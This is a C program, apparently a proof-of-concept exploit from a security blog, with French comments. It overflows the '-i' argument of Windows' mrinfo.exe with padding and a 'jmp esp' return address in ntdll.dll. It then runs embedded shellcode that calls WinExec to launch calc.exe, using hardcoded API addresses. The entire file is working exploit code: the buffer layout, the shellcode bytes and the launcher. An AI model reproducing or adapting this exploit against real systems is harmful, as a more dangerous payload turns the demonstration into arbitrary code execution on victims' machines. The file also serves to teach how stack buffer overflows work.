#include <windows.h>
#include <stdio.h>


int main()
{
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};

    char shellcode[]=
    "\x33\xDB"
    "\x53"
    "\x68\x2E\x65\x78\x65"
    "\x68\x63\x61\x6C\x63"
    "\x68\x6D\x33\x32\x5C"
    "\x68\x79\x73\x74\x65"
    "\x68\x57\x53\x5C\x73"
    "\x68\x49\x4E\x44\x4F"
    "\x68\x43\x3A\x5C\x57"
    "\xBF\x6D\x13\x86\x7C" //Remplacez 7C86136D par l'adresse de votre WinExec
    "\x8B\xC4"
    "\x6A\x05"
    "\x50"
    "\xFF\xD7"
    "\xBF\xDA\xCD\x81\x7C" //Remplacez 7C81CDDA par l'adresse de votre ExitProcess
    "\x53"
    "\xFF\xD7";


    char ret[] = "\xED\x1E\x95\x7C"; //dans ntdll.dll sur un jmp esp

    char name[] = "C:\\WINDOWS\\system32\\mrinfo.exe -i ";
    char* remplissage = (char*) malloc(sizeof(char) * 57);
    remplissage[56] = '\0';
    memset(remplissage,'a',56);

    int alloc = ((strlen(name) + strlen(remplissage) + strlen(ret) + strlen(shellcode) + 4 + 1 ));
    char* exploitation = (char*) malloc(sizeof(char)* alloc);

    ZeroMemory(exploitation,alloc);

    strncat(exploitation,name,strlen(name));
    strncat(exploitation,remplissage,strlen(remplissage));
    strncat(exploitation,ret,strlen(ret));
    strncat(exploitation,"aaaa",4);
    strncat(exploitation,shellcode,strlen(shellcode));


    printf("Exploit MrInfo avec shellcode perso WinExec - 0vercl0k.blogspot.com.\n\nCreation du processus..\n");
    if(CreateProcess(NULL,exploitation,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
    {
        printf("Processus cree.\n");
    }
    WaitForSingleObject(pi.hProcess,INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}